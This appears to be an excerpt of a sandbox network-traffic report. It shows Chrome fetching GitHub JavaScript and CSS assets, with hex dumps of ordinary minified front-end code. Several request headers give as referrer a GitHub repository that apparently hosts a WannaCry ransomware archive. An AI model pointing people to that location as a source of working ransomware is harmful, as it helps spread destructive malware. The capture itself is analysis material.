                                                                                      2024-03-23 14:47:25 UTC16384INData Raw: 20 4d 61 70 2c 64 3d 28 30 2c 69 2e 5a 29 28 6c 2c 7b 63 61 63 68 65 3a 63 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 63 2e 63 6c 65 61 72 28 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 2c 72 2c 69 29 7b 6c 65 74 5b 61 2c 6c 5d 3d 28 30 2c 73 2e 75 73 65 53 74 61 74 65 29 28 29 2c 5b 63 2c 68 5d 3d 28 30 2c 73 2e 75 73 65 53 74 61 74 65 29 28 21 31 29 2c 5b 6d 2c 66 5d 3d 28 30 2c 73 2e 75 73 65 53 74 61 74 65 29 28 21 30 29 2c 70 3d 74 26 26 65 26 26 72 26 26 69 3f 28 30 2c 6f 2e 51 69 29 28 7b 72 65 70 6f 3a 7b 6e 61 6d 65 3a 74 2c 6f 77 6e 65 72 4c 6f 67 69 6e 3a 65 7d 2c 63 6f 6d 6d 69 74 69 73 68 3a 72 2c 61 63 74 69 6f 6e 3a 22 6c 61 74 65 73 74 2d 63 6f 6d 6d 69 74 22 2c 70 61 74 68 3a 69 7d 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 28 30 2c
                                                                                      Data Ascii: Map,d=(0,i.Z)(l,{cache:c});function u(){c.clear()}function h(e,t,r,i){let[a,l]=(0,s.useState)(),[c,h]=(0,s.useState)(!1),[m,f]=(0,s.useState)(!0),p=t&&e&&r&&i?(0,o.Qi)({repo:{name:t,ownerLogin:e},commitish:r,action:"latest-commit",path:i}):null;return(0,
                                                                                      2024-03-23 14:47:25 UTC16384INData Raw: 72 65 64 4d 61 72 6b 64 6f 77 6e 43 6f 6e 74 65 6e 74 22 29 7d 63 61 74 63 68 7b 7d 74 72 79 7b 75 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 28 75 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 53 68 61 72 65 64 4d 61 72 6b 64 6f 77 6e 43 6f 6e 74 65 6e 74 22 29 7d 63 61 74 63 68 7b 7d 7d 2c 38 36 30 32 38 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 4e 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 69 3d 72 28 38 35 38 39 33 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 7b 77 69 64 74 68 3a 65 2c 2e 2e 2e 74 7d 29 7b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 73 74 79 6c 65 3a 7b 77 69 64 74 68 3a 65 7d 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 53 6b 65 6c 65 74 6f 6e 20 53 6b 65 6c 65 74 6f 6e 2d 2d 74 65 78 74 22 2c 2e 2e 2e 74 2c 63 68 69 6c
                                                                                      Data Ascii: redMarkdownContent")}catch{}try{u.displayName||(u.displayName="SharedMarkdownContent")}catch{}},86028:(e,t,r)=>{r.d(t,{N:()=>o});var i=r(85893);function o({width:e,...t}){return(0,i.jsx)("div",{style:{width:e},className:"Skeleton Skeleton--text",...t,chil
                                                                                      2024-03-23 14:47:25 UTC16384INData Raw: 69 6c 64 72 65 6e 3a 28 30 2c 6f 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 72 65 61 63 74 2d 64 69 72 65 63 74 6f 72 79 2d 74 72 75 6e 63 61 74 65 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6f 2e 6a 73 78 29 28 53 2e 72 2c 7b 74 69 74 6c 65 3a 61 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 60 24 7b 74 2e 6e 61 6d 65 7d 2c 20 24 7b 66 75 6e 63 74 69 6f 6e 28 7b 63 6f 6e 74 65 6e 74 54 79 70 65 3a 65 7d 29 7b 72 65 74 75 72 6e 60 28 24 7b 46 5b 65 5d 7c 7c 22 46 69 6c 65 22 7d 29 60 7d 28 74 29 7d 60 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 73 79 6d 6c 69 6e 6b 5f 64 69 72 65 63 74 6f 72 79 22 21 3d 3d 74 2e 63 6f 6e 74 65 6e 74 54 79 70 65 26 26 22 73 79 6d 6c 69 6e 6b 5f 66 69 6c 65 22 21 3d 3d 74 2e 63 6f 6e 74 65 6e 74 54 79 70 65
                                                                                      Data Ascii: ildren:(0,o.jsx)("div",{className:"react-directory-truncate",children:(0,o.jsx)(S.r,{title:a,"aria-label":`${t.name}, ${function({contentType:e}){return`(${F[e]||"File"})`}(t)}`,className:"symlink_directory"!==t.contentType&&"symlink_file"!==t.contentType
                                                                                      2024-03-23 14:47:25 UTC5919INData Raw: 3a 20 30 73 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 26 2e 74 6f 6f 6c 74 69 70 70 65 64 2d 6e 6f 2d 64 65 6c 61 79 2e 74 6f 6f 6c 74 69 70 70 65 64 2d 6f 70 65 6e 2c 0a 20 20 26 2e 74 6f 6f 6c 74 69 70 70 65 64 2d 6e 6f 2d 64 65 6c 61 79 3a 68 6f 76 65 72 2c 0a 20 20 26 2e 74 6f 6f 6c 74 69 70 70 65 64 2d 6e 6f 2d 64 65 6c 61 79 3a 61 63 74 69 76 65 2c 0a 20 20 26 2e 74 6f 6f 6c 74 69 70 70 65 64 2d 6e 6f 2d 64 65 6c 61 79 3a 66 6f 63 75 73 20 7b 0a 20 20 20 20 26 3a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 30 73 3b 0a 20 20 20 20 7d 0a 20 20 7d 0a 0a 20 20 2f 2a 20 54 6f 6f 6c 74 69 70 70 65 64 20 73 6f 75 74 68 20 2a 2f 0a 20 20 26 2e 74 6f 6f 6c 74 69 70 70 65 64 2d 73 2c 0a 20 20 26 2e 74 6f
                                                                                      Data Ascii: : 0s; } } &.tooltipped-no-delay.tooltipped-open, &.tooltipped-no-delay:hover, &.tooltipped-no-delay:active, &.tooltipped-no-delay:focus { &::after { animation-delay: 0s; } } /* Tooltipped south */ &.tooltipped-s, &.to


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      67192.168.2.1649772185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC736OUTGET /assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_github_filter-sort_ts-app_assets_-e50ab6-fd8396d2490b.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 16485
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 12 Mar 2024 16:25:45 GMT
                                                                                      ETag: 0x8DC42B111F56264
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 75595
                                                                                      X-Served-By: cache-iad-kcgs7200175-IAD, cache-lga21981-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 24, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 111bd073f3335a7816cb7c6cb6cb03f74af8fcb1
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 6c 6f 62 2d 61 6e 63 68 6f 72 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 73 6f 72 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 2d 65 35 30 61 62 36 22 5d 2c 7b 39 35 34 37 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 6c 65 74 20 74 3d 65 2e 6d 61 74 63 68 28 2f 23 3f 28 3f 3a 4c 29 28 5c 64 2b 29 28 28 3f 3a 43 29 28 5c 64 2b 29 29 3f 2f 67 29 3b 69 66
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_blob-anchor_ts-app_assets_modules_github_filter-sort_ts-app_assets_-e50ab6"],{95475:(e,t,n)=>{function i(e){let t=e.match(/#?(?:L)(\d+)((?:C)(\d+))?/g);if
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 29 7b 6c 65 74 20 69 3d 5b 6e 75 6c 6c 2c 30 5d 2c 72 3d 6e 28 65 2e 6c 69 6e 65 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 20 69 3b 69 66 28 6e 75 6c 6c 3d 3d 65 2e 63 6f 6c 75 6d 6e 29 72 65 74 75 72 6e 5b 72 2c 2d 31 5d 3b 6c 65 74 20 73 3d 65 2e 63 6f 6c 75 6d 6e 2d 31 2c 6c 3d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 69 66 28 74 2e 6e 6f 64 65 54 79 70 65 3d 3d 3d 4e 6f 64 65 2e 54 45 58 54 5f 4e 4f 44 45 29 72 65 74 75 72 6e 5b 74 5d 3b 69 66 28 21 74 2e 63 68 69 6c 64 4e 6f 64 65 73 7c 7c 21 74 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 5b 5d 3b 6c 65 74 20 6e 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 69 20 6f 66 20 74 2e 63 68 69 6c 64 4e 6f 64 65 73 29 6e 3d 6e 2e 63 6f 6e 63 61 74 28 65 28 69 29 29 3b 72 65 74 75 72 6e
                                                                                      Data Ascii: ){let i=[null,0],r=n(e.line);if(!r)return i;if(null==e.column)return[r,-1];let s=e.column-1,l=function e(t){if(t.nodeType===Node.TEXT_NODE)return[t];if(!t.childNodes||!t.childNodes.length)return[];let n=[];for(let i of t.childNodes)n=n.concat(e(i));return
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 74 29 29 3b 69 66 28 21 69 29 72 65 74 75 72 6e 3b 6c 65 74 20 72 3d 21 31 2c 73 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 65 3d 31 3b 65 3c 69 2e 6c 65 6e 67 74 68 3b 2b 2b 65 29 7b 6c 65 74 20 74 3d 69 5b 65 5d 3b 74 26 26 28 65 25 32 3d 3d 30 3f 72 7c 7c 28 73 2e 70 75 73 68 28 22 3c 6d 61 72 6b 3e 22 29 2c 72 3d 21 30 29 3a 72 26 26 28 73 2e 70 75 73 68 28 22 3c 2f 6d 61 72 6b 3e 22 29 2c 72 3d 21 31 29 2c 73 2e 70 75 73 68 28 74 29 29 7d 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 73 2e 6a 6f 69 6e 28 22 22 29 7d 65 6c 73 65 7b 6c 65 74 20 74 3d 65 2e 69 6e 6e 65 72 48 54 4d 4c 2e 74 72 69 6d 28 29 2c 6e 3d 74 2e 72 65 70 6c 61 63 65 28 2f 3c 5c 2f 3f 6d 61 72 6b 3e 2f 67 2c 22 22 29 3b 74 21 3d 3d 6e 26 26 28 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 6e 29 7d 7d 6e 2e
                                                                                      Data Ascii: t));if(!i)return;let r=!1,s=[];for(let e=1;e<i.length;++e){let t=i[e];t&&(e%2==0?r||(s.push("<mark>"),r=!0):r&&(s.push("</mark>"),r=!1),s.push(t))}e.innerHTML=s.join("")}else{let t=e.innerHTML.trim(),n=t.replace(/<\/?mark>/g,"");t!==n&&(e.innerHTML=n)}}n.
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 79 6d 62 6f 6c 73 5b 6e 5d 2e 64 65 70 74 68 7d 3b 69 66 28 65 2e 68 61 73 28 69 2e 73 74 61 72 74 4c 69 6e 65 29 29 7b 6c 65 74 20 74 3d 65 2e 67 65 74 28 69 2e 73 74 61 72 74 4c 69 6e 65 29 3b 74 2e 70 75 73 68 28 69 29 2c 65 2e 73 65 74 28 69 2e 73 74 61 72 74 4c 69 6e 65 2c 74 29 7d 65 6c 73 65 20 65 2e 73 65 74 28 69 2e 73 74 61 72 74 4c 69 6e 65 2c 5b 69 5d 29 3b 69 66 28 65 2e 68 61 73 28 69 2e 65 6e 64 4c 69 6e 65 29 29 7b 6c 65 74 20 74 3d 65 2e 67 65 74 28 69 2e 65 6e 64 4c 69 6e 65 29 3b 74 2e 70 75 73 68 28 69 29 2c 65 2e 73 65 74 28 69 2e 65 6e 64 4c 69 6e 65 2c 74 29 7d 65 6c 73 65 20 65 2e 73 65 74 28 69 2e 65 6e 64 4c 69 6e 65 2c 5b 69 5d 29 3b 66 6f 72 28 6c 65 74 20 65 3d 69 2e 73 74 61 72 74 4c 69 6e 65 2b 31 3b 65 3c 69 2e 65 6e 64 4c
                                                                                      Data Ascii: ymbols[n].depth};if(e.has(i.startLine)){let t=e.get(i.startLine);t.push(i),e.set(i.startLine,t)}else e.set(i.startLine,[i]);if(e.has(i.endLine)){let t=e.get(i.endLine);t.push(i),e.set(i.endLine,t)}else e.set(i.endLine,[i]);for(let e=i.startLine+1;e<i.endL
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 72 65 61 6b 7d 72 65 74 75 72 6e 20 69 7d 28 74 2c 65 29 3b 65 2b 3d 68 28 69 29 2c 74 68 69 73 2e 73 79 6d 62 6f 6c 54 72 65 65 2e 70 75 73 68 28 7b 73 79 6d 62 6f 6c 3a 6e 2e 73 79 6d 62 6f 6c 2c 69 73 50 61 72 65 6e 74 3a 21 30 2c 63 68 69 6c 64 72 65 6e 3a 69 7d 29 3b 63 6f 6e 74 69 6e 75 65 7d 7d 74 68 69 73 2e 73 79 6d 62 6f 6c 54 72 65 65 2e 70 75 73 68 28 7b 73 79 6d 62 6f 6c 3a 6e 2e 73 79 6d 62 6f 6c 2c 69 73 50 61 72 65 6e 74 3a 21 31 2c 63 68 69 6c 64 72 65 6e 3a 5b 5d 7d 29 7d 7d 7d 63 72 65 61 74 65 52 65 66 65 72 65 6e 63 65 73 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6d 61 70 28 65 3d 3e 7b 6c 65 74 20 74 3d 6e 65 77 20 73 2e 69 36 28 7b 69 64 65 6e 74 3a 65 2c 72 65 70 6f 3a 74 68 69 73 2e 72 65 70 6f 2c 72 65 66 49 6e 66 6f 3a 74 68 69 73
                                                                                      Data Ascii: reak}return i}(t,e);e+=h(i),this.symbolTree.push({symbol:n.symbol,isParent:!0,children:i});continue}}this.symbolTree.push({symbol:n.symbol,isParent:!1,children:[]})}}}createReferences(e){return e.map(e=>{let t=new s.i6({ident:e,repo:this.repo,refInfo:this
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 73 3d 74 68 69 73 2e 67 65 74 53 79 6d 62 6f 6c 4f 6e 4c 69 6e 65 28 74 2b 31 29 3b 69 66 28 73 29 72 3d 73 2e 6b 69 6e 64 2e 65 6e 75 6d 53 74 72 69 6e 67 56 61 6c 3b 65 6c 73 65 7b 6c 65 74 7b 64 65 66 69 6e 69 74 69 6f 6e 73 3a 65 7d 3d 61 77 61 69 74 20 69 3b 72 3d 65 5b 30 5d 3f 2e 6b 69 6e 64 3f 2e 65 6e 75 6d 53 74 72 69 6e 67 56 61 6c 7c 7c 72 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 41 6c 65 70 68 52 65 66 65 72 65 6e 63 65 73 28 65 2c 74 2c 6e 2c 74 68 69 73 2e 6c 6f 67 67 65 64 49 6e 2c 72 29 7d 29 28 29 2c 61 3d 28 61 73 79 6e 63 28 29 3d 3e 7b 6c 65 74 5b 65 2c 74 5d 3d 61 77 61 69 74 20 6c 3b 72 65 74 75 72 6e 7b 72 65 66 65 72 65 6e 63 65 73 3a 65 2c 62 61 63 6b 65 6e 64 3a 74 7d 7d 29 28 29 3b 72 65 74 75 72 6e 7b 64 65 66 69 6e 69
                                                                                      Data Ascii: s=this.getSymbolOnLine(t+1);if(s)r=s.kind.enumStringVal;else{let{definitions:e}=await i;r=e[0]?.kind?.enumStringVal||r}return this.getAlephReferences(e,t,n,this.loggedIn,r)})(),a=(async()=>{let[e,t]=await l;return{references:e,backend:t}})();return{defini
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 72 6e 5b 5b 5d 2c 63 5d 7d 63 3d 6f 28 68 2e 62 61 63 6b 65 6e 64 29 3f 3f 22 73 65 61 72 63 68 22 3b 6c 65 74 20 66 3d 6e 65 77 20 53 65 74 2c 6d 3d 65 3d 3e 21 21 66 2e 68 61 73 28 65 29 7c 7c 28 66 2e 61 64 64 28 65 29 2c 21 31 29 2c 70 3d 68 2e 70 61 79 6c 6f 61 64 2e 66 6c 61 74 4d 61 70 28 65 3d 3e 65 29 2e 72 65 64 75 63 65 28 28 65 2c 74 29 3d 3e 7b 69 66 28 74 2e 70 61 74 68 3d 3d 3d 74 68 69 73 2e 70 61 74 68 29 72 65 74 75 72 6e 20 65 3b 6c 65 74 20 6e 3d 28 30 2c 61 2e 52 63 29 28 74 2c 7b 73 74 79 6c 69 6e 67 44 69 72 65 63 74 69 76 65 73 3a 74 68 69 73 2e 73 74 79 6c 69 6e 67 44 69 72 65 63 74 69 76 65 73 2c 72 65 70 6f 3a 74 68 69 73 2e 72 65 70 6f 2c 72 65 66 49 6e 66 6f 3a 74 68 69 73 2e 72 65 66 49 6e 66 6f 2c 70 61 74 68 3a 74 68 69 73
                                                                                      Data Ascii: rn[[],c]}c=o(h.backend)??"search";let f=new Set,m=e=>!!f.has(e)||(f.add(e),!1),p=h.payload.flatMap(e=>e).reduce((e,t)=>{if(t.path===this.path)return e;let n=(0,a.Rc)(t,{stylingDirectives:this.stylingDirectives,repo:this.repo,refInfo:this.refInfo,path:this
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6f 6e 65 26 26 65 2e 6c 65 6e 67 74 68 3c 32 30 30 3b 29 7b 6c 65 74 7b 63 6f 6c 75 6d 6e 3a 74 2c 63 6f 6c 75 6d 6e 45 6e 64 3a 6e 7d 3d 61 2e 76 61 6c 75 65 3b 65 2e 70 75 73 68 28 7b 73 74 61 72 74 3a 7b 6c 69 6e 65 3a 69 2e 69 64 65 6e 74 2e 73 74 61 72 74 2e 6c 69 6e 65 2c 63 6f 6c 75 6d 6e 3a 74 7d 2c 65 6e 64 3a 7b 6c 69 6e 65 3a 69 2e 69 64 65 6e 74 2e 73 74 61 72 74 2e 6c 69 6e 65 2c 63 6f 6c 75 6d 6e 3a 6e 7d 7d 29 2c 61 3d 73 2e 6e 65 78 74 28 29 7d 72 65 74 75 72 6e 20 65 7d 2c 5b 5d 29 3b 69 66 28 73 2e 6c 65 6e 67 74 68 3c 32 30 30 26 26 69 29 7b 6c 65 74 20 69 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2e 69 64 65 6e 74 2e 73 74 61 72 74 2e 6c 69 6e 65 2c 72 3d 28 30 2c 6c 2e 50 63 29 28 6e 2c 74 2c 69 29 2c 61 3d 72 2e 6e 65 78 74 28 29 3b
                                                                                      Data Ascii: one&&e.length<200;){let{column:t,columnEnd:n}=a.value;e.push({start:{line:i.ident.start.line,column:t},end:{line:i.ident.start.line,column:n}}),a=s.next()}return e},[]);if(s.length<200&&i){let i=e[e.length-1].ident.start.line,r=(0,l.Pc)(n,t,i),a=r.next();
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 63 61 73 65 22 63 6c 61 73 73 22 3a 63 61 73 65 22 63 61 6c 6c 22 3a 63 61 73 65 22 65 6e 75 6d 22 3a 63 61 73 65 22 66 69 65 6c 64 22 3a 63 61 73 65 22 6d 61 63 72 6f 22 3a 63 61 73 65 22 73 74 72 75 63 74 22 3a 63 61 73 65 22 74 72 61 69 74 22 3a 63 61 73 65 22 74 79 70 65 22 3a 63 61 73 65 22 75 6e 69 6f 6e 22 3a 72 65 74 75 72 6e 20 65 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 31 29 7d 7d 28 74 29 2c 74 68 69 73 2e 70 6c 43 6f 6c 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 66 75 6e 63 74 69 6f 6e 22 3a 63 61 73 65 22 6d 65 74 68 6f 64 22 3a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 22 70 72 65 74 74 79 6c 69 67 68 74 73 2e 73 79 6e 74 61 78 2e 65 6e 74 69 74
                                                                                      Data Ascii: case"class":case"call":case"enum":case"field":case"macro":case"struct":case"trait":case"type":case"union":return e;default:return e.substring(0,1)}}(t),this.plColor=function(e){switch(e){case"function":case"method":default:return"prettylights.syntax.entit
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 69 64 7d 2f 24 7b 74 68 69 73 2e 70 61 74 68 7d 60 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 7b 69 64 65 6e 74 3a 65 2c 65 78 74 65 6e 74 3a 74 2c 6b 69 6e 64 3a 6e 2c 6e 61 6d 65 3a 69 2c 66 75 6c 6c 79 51 75 61 6c 69 66 69 65 64 4e 61 6d 65 3a 72 2c 73 6f 75 72 63 65 3a 73 7d 29 7b 74 68 69 73 2e 69 64 65 6e 74 3d 65 2c 74 68 69 73 2e 65 78 74 65 6e 74 3d 74 2c 74 68 69 73 2e 6b 69 6e 64 3d 6e 65 77 20 53 79 6d 62 6f 6c 4b 69 6e 64 28 7b 6b 69 6e 64 3a 6e 7d 29 2c 74 68 69 73 2e 6e 61 6d 65 3d 69 2c 74 68 69 73 2e 66 75 6c 6c 79 51 75 61 6c 69 66 69 65 64 4e 61 6d 65 3d 72 2c 74 68 69 73 2e 73 6f 75 72 63 65 3d 73 7d 7d 3b 6c 65 74 20 43 6f 64 65 52 65 66 65 72 65 6e 63 65 3d 63 6c 61 73 73 20 43 6f 64 65 52 65 66 65 72 65 6e 63 65 7b 67 65 74 20 6c 69 6e
                                                                                      Data Ascii: id}/${this.path}`}constructor({ident:e,extent:t,kind:n,name:i,fullyQualifiedName:r,source:s}){this.ident=e,this.extent=t,this.kind=new SymbolKind({kind:n}),this.name=i,this.fullyQualifiedName=r,this.source=s}};let CodeReference=class CodeReference{get lin


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      68192.168.2.1649773185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC651OUTGET /assets/react-code-view-c04a0c63417c.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 303577
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Fri, 22 Mar 2024 18:11:47 GMT
                                                                                      ETag: 0x8DC4A9B8A00F004
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 72298
                                                                                      X-Served-By: cache-iad-kcgs7200023-IAD, cache-lga21968-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 36, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 90b095dde05e0cfbeb4805b55dbbb23feaff6d97
                                                                                      2024-03-23 14:47:25 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 72 65 61 63 74 2d 63 6f 64 65 2d 76 69 65 77 22 5d 2c 7b 34 36 32 36 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 3d 30 2c 7b 73 74 61 72 74 3a 6e 3d 21 30 2c 6d 69 64 64 6c 65 3a 72 3d 21 30 2c 6f 6e 63 65 3a 69 3d 21 31 7d 3d 7b 7d 29 7b 6c 65 74 20 61 2c 6f 3d 30 2c 6c 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 73 28 2e 2e 2e 63 29 7b 69 66 28 6c 29 72 65 74 75 72 6e 3b 6c 65 74 20 64 3d 44 61 74 65 2e 6e 6f 77 28 29 2d 6f 3b 6f 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 6e 3f 28 6e 3d 21 31 2c 65 2e 61 70 70
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["react-code-view"],{46263:(e,t,n)=>{function r(e,t=0,{start:n=!0,middle:r=!0,once:i=!1}={}){let a,o=0,l=!1;function s(...c){if(l)return;let d=Date.now()-o;o=Date.now(),n?(n=!1,e.app
                                                                                      2024-03-23 14:47:25 UTC16384INData Raw: 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 35 30 25 29 3b 7d 7d 26 2e 74 6f 6f 6c 74 69 70 70 65 64 2d 6d 75 6c 74 69 6c 69 6e 65 7b 26 3a 3a 61 66 74 65 72 7b 77 69 64 74 68 3a 6d 61 78 2d 63 6f 6e 74 65 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 32 35 30 70 78 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 6c 69 6e 65 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 73 65 70 61 72 61 74 65 3b 7d 26 2e 74 6f 6f 6c 74 69 70 70 65 64 2d 73 3a 3a 61 66 74 65 72 2c 26 2e 74 6f 6f 6c 74 69 70 70 65 64 2d 6e 3a 3a 61 66 74 65 72 7b 72 69 67 68 74 3a 61 75 74 6f 3b 6c 65 66 74 3a 35 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 30 25 29 3b 7d 26 2e 74 6f 6f 6c 74 69 70
                                                                                      Data Ascii: m:translateY(50%);}}&.tooltipped-multiline{&::after{width:max-content;max-width:250px;word-wrap:break-word;white-space:pre-line;border-collapse:separate;}&.tooltipped-s::after,&.tooltipped-n::after{right:auto;left:50%;transform:translateX(-50%);}&.tooltip
